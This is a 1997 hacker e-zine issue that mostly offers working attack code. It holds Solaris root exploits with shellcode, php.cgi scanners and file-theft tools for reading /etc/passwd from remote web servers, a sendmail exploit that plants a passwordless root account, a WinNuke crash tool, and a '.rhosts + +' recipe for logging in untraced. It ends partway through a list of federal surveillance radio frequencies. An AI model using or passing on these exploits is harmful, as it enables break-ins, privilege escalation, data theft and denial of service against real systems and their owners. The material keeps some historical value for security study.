ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== =--------------------=====================================--------------------= =--------------------= Status : Confidence Remains High. =--------------------= =--------------------= Issue : 002. =--------------------= =--------------------= Date : May 26th 1997. =--------------------= =--------------------=====================================--------------------= =============================================================================== =====================> http://www.codez.com NOW UP!@#* <===================== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .:. Site Of The Month .:. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =====================> http://www.codez.com NOW UP!@#* <===================== =====================> http://www.codez.com NOW UP!@#* <===================== =====================> http://www.codez.com NOW UP!@#* <===================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ In This HUUUUUUuuuUUUUUGE Issue : ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ -----=> Section A : Introduction And Cover Story. 1. Confidence Remains High Issue 2....................: Tetsu Khan 2. wh0 the King?......................................: so1o 3. www.codez.com......................................: fr1day -----=> Section B : Exploits And Code. 1. Unpatched Solaris 2.3 / 2.4 Exploit -=> solsuid.c.: Shawn Instenes 2. Pretty Useful Solaris 2.5.1 Exploit -=> ban251.c..: s0me Bugtraq d00d 3. Scan For php Vunerable Servers ------=> phpscan.c.: so1o 4. Use php.cgi To Get Files ------------=> phpget.c..: p1 5. Hiding From Who (incase you didn't read the pilots): so1o 6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit...............: p1 7. Ident Scanner (ident-scan.c).......................: Dave Goldsmith 8. Windoze NT / 95 Killer : winnuke.c.................: _eci -----=> Section C : Phones / Scanning / Radio. 1. Federal Bugging Frequencies........................: Weapon-X 2. 911 Autodialler Script.............................: dk 3. Cellular Calls Without Cloning.....................: TRON -----=> Section D : Miscellaneous. 1. Getting Your Exploits Onto Systems.................: so1o 2. Fakemailing Techniques.............................: so1o 3. Pascal Credit Card Generator Source................: Lobster Guacamole 4. in.courierd : backdoor on port 530.................: so1o 5. UK Laws On Computer Misuse.........................: Darkfool 6. so1o Gets Busted By CERT...........................: so1o 7. CERT Advisory CA-97.13 : xlock vunerablity.........: BugTraq 8. IRiX WWW Server Bugs...............................: Tetsu Khan 9. Hacking Not-So-Electrical Items....................: Tetsu Khan -----=> Section E : World News. 1. Amnesty International Hacked.......................: Article from cnet.com 2. //sToRm// Of sIn Rips Port Pro.....................: so1o 3. Digital Darkness Lives.............................: so1o 4. /home/sdr 0wned....................................: so1o 5. Sendmail 8.8.4 Remote Is Out.......................: so1o 6. sIn inf0z Part 2...................................: The CodeZero ------=> Section F : Projects. 1. The [C]odeZero [R]emote [A]ttack [K]it (CRAK.tar)..: so1o -----=> Section G : The End. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. Confidence Remains High Issue 002 : Tetsu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ We have been very busy over the last 50 days, but we still managed to put together the CodeZero Remote Attack Kit, which contains some very cutting edge tools as well as some very optimised code, we have included all the programs precompiled to run from a Linux 2.0.x box, this way you dont even need a compiler to build this shit =) the source will be available when we can be bothered to put it on our page, so enjoy this second *FREE* issue of... ...Confidence Remains High! T_K One last thing, this issue is a BUMPER WWW hacking issue! because CERT and the IRT are cool, and they think I live in Sweden :) Heres a disclaimer, just in case anyone does get a bit annoyed : *************************************************************************** ** NONE OF THE DATA CONTAINED WITHIN THIS FILE IS TO BE USED UNETHICALLY ** ** USE THIS DATA AT YOUR OWN RISK AND DON'T COME CRYING TO US IF CERT ** ** COME ROUND YOUR HOUSE AND KICK YOUR FUCKING ASS, KILL YOUR PARENTS ** ** AND YOUR DOG AND CONFISCATE ALL YOUR SHIT. ** *************************************************************************** ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. wh0 the King? : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Okay, heres a rundown of the main groups and associations around the scene on the efnet at this moment in time, as well as some comments and members... r00t ==== Many say r00t own us, members include : aleph1 Veggie tfish As in, Aleph One of dfw.net and underground.org, Death Veggie of the cDc, Tweety Fish of the cDc Ninja Strike Force (I also heard he designed the NHC security) as well as ALOT of others who are very well known in the underground. r00t are definately the biggest group on the scene, and easily the most powerful. el8 === el8 is another very powerful group, with members that between them make el8 a force to be feared, members include : prym bw- tsal Overall, a good group, with some very smart people. The CodeZero ============ We d0nt like to talk about ourselves, boosted up to 7 men now :) The Secret Mouse Society (sms) ============================== I dont really know much of this groups true power, but members include... Calidor vertex vortex They have many shells traders, and therefore probably alot of influence in the shells world, as well as experience, quite a large group. I wont even talk about Undernet groups, seeing they continually split, join other groups, change names, rip other people code, shit like that, basically acting like 12 year old warez kiddies (take sIn for example, or maybe even Psychosis.) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. www.codez.com : fr1day ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Yah000!!!@# wE gOt A dOmAin!!!@~# On www.codez.com we will have 40mb of space, this will include the following.. -=[ The Confidence Remains High Distro Point -=[ The CodeZero Exploits / Programs And Tools Page -=[ The Solaris 2.4 / 2.5.x Exploit Collection -=[ The Solaris Tools Collection -=[ The Solaris CodeZero Tools Collection -=[ The Linux 2.0.x Exploit Collection -=[ The Linux Tools Collection -=[ The Linux CodeZero Tools Collection -=[ W1nd0ze And d0S Tools Collection -=[ Assorted Text Philes Collection -=[ The CodeZero FTP Site -=[ H/P/A/V/C E-Zine Archive -=[ CodeZero Precompiled Linux / Solaris Tools And Exploits Archive So don't delay! GO THERE TODAY!@# And if you can, please link your sites to www.codez.com, as we would be very grateful :) Seeing we are basically giving all this shit to you for PHREE! phr1day ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. Unpatched Solaris 2.3 / 2.4 Exploit : solsuid.c : Shawn Instenes ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ /* If a tty port that is writeable by the user and owned by root is opened and the I_PUSH "ms" ioctl call made followed by an lseek the effective uid of the user is changed to root. */ #include #include #include #include #include #include #include main(argc, argv) int argc; char* argv[]; { int fd; if (argc < 2) { fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]); exit(1); } fd = open("/dev/ttyb", O_RDWR); printf("Your current effective uid is %d\n", geteuid()); ioctl(fd, I_PUSH, "ms"); lseek(fd, 0, 1); printf("Your effective uid has been changed to %d\n", geteuid()); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. Pretty Useful Solaris 2.5.1 Exploit : ban251.c : s0me bugtraq d00d ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ /* Written for Solaris 2.5.1 (sunOS 5.5.1) with /bin/eject */ #include #include #include #include #define BUF_LENGTH 364 #define EXTRA 400 #define STACK_OFFSET 400 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" "\x91\xd0\x20\x08" ; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA + 8]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf ; targ_addr = get_sp() - STACK_OFFSET - dso; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ =targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/bin/eject", "eject", & buf[1],(char *) 0); perror("execl failed"); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. Scan For php Vunerable Servers : phpscan.c : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ The next two programs, phpscan.c and phpget.c are fully compiled in the CodeZero Remote Attack Kit, details about the whole kit in section F, part 2. These two programs use a hole in the php.cgi code that allows remote users to read any file on the system that the http daemon has access to. Vunerable servers I have found include www.2600.com (FreeBSD 2.1), so it does have some effect, use phpscan.c to scan from a list of hosts, then phpget.c to retrieve files from the remote hosts. Here begins the c0de... /* phpscan.c : php.cgi vunerable server scanning program. Basically a modified phf scanner, by Alhambra of The Guild. Modifications to php.cgi by so1o of The CodeZero. Usage: phpscan */ #include #include #include #include #include #include #include #include #include #ifdef LINUX #include #endif #include #include #include #include #include #include int FLAG = 1; int Call(int signo) { FLAG = 0; } main (int argc, char *argv[]) { char host[100], buffer[1024], hosta[1024],FileBuf[8097]; int outsocket, serv_len, len,X,c,outfd; struct hostent *nametocheck; struct sockaddr_in serv_addr; struct in_addr outgoing; char PHPMessage[]="GET cgi-bin/php.cgi?/etc/passwd\n"; while(fgets(hosta,100,stdin)) { if(hosta[0] == '\0') break; hosta[strlen(hosta) -1] = '\0'; write(1,hosta,strlen(hosta)*sizeof(char)); write(1,"\n",sizeof(char)); outsocket = socket (AF_INET, SOCK_STREAM, 0); memset (&serv_addr, 0, sizeof (serv_addr)); serv_addr.sin_family = AF_INET; nametocheck = gethostbyname (hosta); (void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],sizeof (outgoing.s_addr)); strcpy (host, inet_ntoa (outgoing)); serv_addr.sin_addr.s_addr = inet_addr (host); serv_addr.sin_port = htons (80); signal(SIGALRM,Call); FLAG = 1; alarm(10); X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr)); alarm(0); if(FLAG == 1 && X==0){ write(outsocket,PHPMessage,strlen(PHPMessage)*sizeof(char)); while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X); } close (outsocket); } return 0; } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 4. Use php To Get Files : phpget.c : p1 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Heres the phpget.c, use it wisely...Some useful files to pull include... /etc/passwd /etc/hosts /etc/services /etc/syslogd.conf /etc/inetd.conf /* p1 (peewun@heterosexual.com) This code retrieves a file using php.cgi on a remote system. This program is for educational purposes only. Use it on p1.com. */ #include #include #include #include #include #include #include #include FILE *server; int sock; void do_connect(char *host, char *toget); void do_connect(char *host, char *toget) { char inbuf[1024]; struct sockaddr_in sin; struct hostent *hp; char *tmpbuf; hp = gethostbyname(host); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(80); sock = socket(AF_INET, SOCK_STREAM, 0); if ( -1 < connect(sock, (struct sockaddr *) &sin, sizeof(sin)) ) { printf("Made connection to %s.\n\n", host); } else { printf("Failed to connect to %s.\n\n",host); exit(0); } server=fdopen(sock, "a+"); fprintf(server, "GET /cgi-bin/php.cgi?%s\n",toget); printf("Output from php.cgi request:\n\n"); while(1){ if (fgets(inbuf, 1024, server) == NULL) break; printf(inbuf); } } main(int argc,char **argv) { printf("\nThis program retrieves files off a remote system using php.cgi.\n"); printf("Author: p1 - peewun@heterosexual.com\n"); if (argc < 3) { printf("Usage: %s \n",argv[0]); printf(" Ex: %s www.p1.com /etc/passwd\n",argv[0]); } else { char *buffer; (char *)"exit"; do_connect(argv[1],argv[2]); exit(1); } } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 5. Hiding From Who : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Okay, bog standard easy shit, works on nearly all systems depending on security arrangements, I advise you always try this method first when trying to hide. DONT type the % signs !!!@~"!* ThEy ArE PrOmPtZ!!! Telnet into the system, then type... % cd % echo "+ +" >> .rhosts If this gives an error, like "Cannot create .rhosts" then try... % cd % echo "+ +" > .rhosts Next telnet to the machines EXACT address, not 127.0.0.1 or localhost, this way works the most effectively..as it says "last login from..." and you don't want your ip to be mentioned, or for anyone to get suspicious, so you will need to cover your tracks. % telnet machine.host.com (then log in again, using the same L/P) now exit completely, using exit twice. The system is now all set up for you to log in without being seen or logged, as the + + you echo to the .rhosts file in the users home directory is actually used so that you can remotely execute commands on the system using rsh, or login into the system remotely, using rlogin, neither operations require a password, just a login name, so if the user changes his password, you will still be able to use this technique, now we can attempt to log into the system untraced, for this we need to either run linux, or be in a shell, follow this one, easy step, replace "login" with your login, and host.com with the EXACT host you want to get into... % rsh -l login host.com csh -i eg... % rsh -l tetsu microsoft.com csh -i This then runs csh (c shell) on the remote host (microsoft) in interactive mode..you should see something like this... % rsh -l tetsu microsoft.com csh -i ...Thus no control on this tty, blah blah blah % Now you are in, type who : % who % w00 w00!! no-one seems to be logged in, and you are therefore hidden!! Now you can proceed to hack the host without having to worry whos watching you. Note : Systems Administrators often look over their users directories for .rhosts files, so be aware of that. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit : p1 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ If modeX would have given us his 884 REMOTE exploit with all the offsets, then we would have published it, but he didn't, so we ain't :( Have the local version instead... #!/bin/bash clear echo echo Sendmail 8.8.4 and 8.8.5 local exploit. echo Scripting by p1 \(peewun@heterosexual.com\) on 4-15-97. echo if [ $1 = "-rm" ] then echo Removing /var/tmp/dead.letter echo rm -rf /var/tmp/dead.letter echo Attempting to continue with exploit. echo fi if [ -e /var/tmp/dead.letter ] then echo File exists: /var/tmp/dead.letter echo echo If you wish to run this exploit, please delete it by running this echo exploit with the -rm flag. echo exit fi ln -s /etc/passwd /var/tmp/dead.letter cat >> unf << _EOF_ helo mail from: very@bad.address.here rcpt to: another@bad.bad.address data owned::0:0:exploitation:/:/bin/sh . _EOF_ cat unf | telnet localhost 25 >> /dev/null rm -rf unf echo echo Please wait for dead.letter to possibly be appended to by sendmail. echo sleep 10 if grep exploitation /etc/passwd then echo Successful addition of account 'owned' to /etc/passwd, running 'su.' su owned else echo Unsuccessful exploitation of symbolic link bug. fi ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 7. Ident Scanner : ident-scan.c : Dave Goldsmith ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Very very useful and quick tool, especially if it finds daemons running as root that shouldn't be...Or even backdoors on high ports. Usage : ident-scan [low port] [high port] /* * ident-scan [v0.15] * This TCP scanner has the additional functionality of retrieving * the username that owns the daemon running on the specified port. * It does this by by attempting to connect to a TCP port, and if it * succeeds, it will send out an ident request to identd on the * remote host. I believe this to be a flaw in the design of the * protocol, and if it is the developers intent to allow 'reverse' * idents, then it should have been stated clearer in the * rfc(rfc1413). * * USES: * It can be useful to determine who is running daemons on high ports * that can be security risks. It can also be used to search for * misconfigurations such as httpd running as root, other daemons * running under the wrong uids. * * COMPILES: Compiles fine under Linux, BSDI and SunOS 4.1.x. * * Dave Goldsmith * */ #include #include #include #include #include #include #include #include #include enum errlist { BAD_ARGS,BAD_HOST,NO_IDENT,SOCK_ERR }; void usage(error) enum errlist error; { fprintf(stderr,"ident-scan: "); switch(error) { case BAD_ARGS: fprintf(stderr,"usage: ident-scan hostname [low port] [hi port]\n"); break; case BAD_HOST: fprintf(stderr,"error: cant resolve hostname\n"); break; case NO_IDENT: fprintf(stderr,"error: ident isnt running on host\n"); break; case SOCK_ERR: fprintf(stderr,"error: socket() failed\n"); break; } exit(-1); } struct hostent * fill_host(machine,host) char *machine; struct hostent *host; { if ((host=gethostbyname(machine))==NULL) { if ((host=gethostbyaddr(machine,4,AF_INET))==NULL) return(host); } return(host); } int main(argc,argv) int argc; char **argv; { struct sockaddr_in forconnect,forport,forident; int i,sockfd,identfd,len=sizeof(forport),hiport=9999,loport=1,curport; struct servent *service; struct hostent *host; char identbuf[15], recieved[85], *uid; if ((argc<2) || (argc>4)) usage(BAD_ARGS); if (argc>2) loport=atoi(argv[2]); if (argc>3) hiport=atoi(argv[3]); if ((host=fill_host(argv[1],host))==NULL) usage(BAD_HOST); forconnect.sin_family=host->h_addrtype; forconnect.sin_addr.s_addr=*((long *)host->h_addr); forident.sin_family=host->h_addrtype; forident.sin_addr.s_addr=*((long *)host->h_addr); forident.sin_port=htons(113); if ((identfd=socket(AF_INET,SOCK_STREAM,0))== -1) usage(SOCK_ERR); if ((connect(identfd,(struct sockaddr *)&forident,sizeof(forident)))!=0) usage(NO_IDENT); close(identfd); for(curport=loport;curport<=hiport;curport++) { for(i=0;i!=85;i++) recieved[i]='\0'; forconnect.sin_port=htons(curport); if ((sockfd=socket(AF_INET,SOCK_STREAM,0))== -1) usage(SOCK_ERR); if (connect(sockfd,(struct sockaddr *)&forconnect,sizeof(forconnect))==0) { if (getsockname(sockfd,(struct sockaddr *)&forport,&len)==0) { if ((identfd=socket(AF_INET,SOCK_STREAM,0))== -1) usage(SOCK_ERR); if (connect(identfd,(struct sockaddr *)&forident,sizeof(forident))==0) { sprintf(identbuf,"%u,%u",htons(forconnect.sin_port), htons(forport.sin_port)); write(identfd,identbuf,strlen(identbuf)+1); read(identfd,recieved,80); recieved[strlen(recieved)-1]='\0'; uid=strrchr(recieved,' '); service=getservbyport(forconnect.sin_port,"tcp"); printf("Port: %3d\tService: %10s\tUserid: %s\n",curport, (service==NULL)?"(?)":service->s_name,uid); } } } close(sockfd); close(identfd); } } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 8. Windoze NT / 95 Killer : winnuke.c : _eci ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ /* winnuke.c - (05/07/97) By _eci */ /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */ #include #include #include #include #include #include #include #define dport 139 /* Attack port: 139 is what we want */ int x, s; char *str = "Bye"; /* Makes no diff */ struct sockaddr_in addr, spoofedaddr; struct hostent *host; int open_sock(int sock, char *server, int port) { struct sockaddr_in blah; struct hostent *he; bzero((char *)&blah,sizeof(blah)); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(server); blah.sin_port=htons(port); if ((he = gethostbyname(server)) != NULL) { bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length); } else { if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) { perror("gethostbyname()"); return(-3); } } if (connect(sock,(struct sockaddr *)&blah,16)==-1) { perror("connect()"); close(sock); return(-4); } printf("Connected to [%s:%d].\n",server,port); return; } void main(int argc, char *argv[]) { if (argc != 2) { printf("Usage: %s \n",argv[0]); exit(0); } if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket()"); exit(-1); } open_sock(s,argv[1],dport); printf("Sending crash... "); send(s,str,strlen(str),MSG_OOB); usleep(100000); printf("Done!\n"); close(s); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. Federal Bugging Frequencies : Weapon-X ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Commonly Used by Federal Agencies for Bugs, Wireless Microphones, and Body Wires (also 138-220 mhz, and 399-420 mhz, under 25-50 mw). 149.3500, 165.9125, 167.3375, 167.3425, 167.4875, 168.0115, 169.2000, 169.4450, 169.5050, 170.2450, 170.3050, 171.0450, 171.1050, 171.4500, 171.6000, 171.7500, 171.8450, 171.8500, 171.9050, 172.0000, 172.2000, 172.2125, 172.2375, 172.2625, 172.2875, 172.3125, 172.3375, 172.3625, 172.3875, 172.5500 173.3375 169.445, 169.505, 170.245, 170.305, 171.045, 171.105, 171.845, 171.905 27.5750 Customs Low Power < 5 watts 27.5850 Customs Low Power < 5 watts 163.1000 Customs Low Power < 30 watts 418.5750 Customs Low Power < 30 watts 40.1200 Federal Shared Mobile Locator Tranmitters "Bumper Beepers" 40.1700 Federal Shared Mobile Locator Tranmitters "Bumper Beepers" 40.2200 Federal Shared Mobile Locator Tranmitters "Bumper Beepers" 40.2700 Federal Shared Mobile Locator Tranmitters "Bumper Beepers" 164.9125 FBI Surveillance 165.9125 ATF F5 Surveillance 166.2875 ATF 170.4125 ATF 407.8000 Secret Service 406.2750 Secret Service 408.5000 Secret Service 408.9750 Secret Service 172.2000 DOJ/DEA CH.1 171.6000 DOJ/DEA CH.2 418.0500 DEA Low Power 418.0750 DEA Low Power 418.5750 DEA Low Power 418.7500 DEA 418.6750 DEA 418.9000 DEA F2 CINDY (416.325) Surveillance 418.7500 DEA F3 GAIL Surveillance/Strike Force 418.6750 DEA F4 EMILY (416.325) Surveillance 407.8000 CIA, State Department 408.0500 Federal Shared 408.5750 Federal Shared 409.4000 Federal Shared 960-1215mhz Spread Spectrum Systems (Wideband) Generally Recognized Federal Bug/Spy Bands Primary - 25-50mhz, 135-175mhz, 225-440mhz, 1710-1950mhz, 8.3-12.5ghz Secondary - 890mhz-5.50ghz, 7.0-9.5ghz, 10-39.6ghz Also, Wide Band Frequency Hopping centered on various 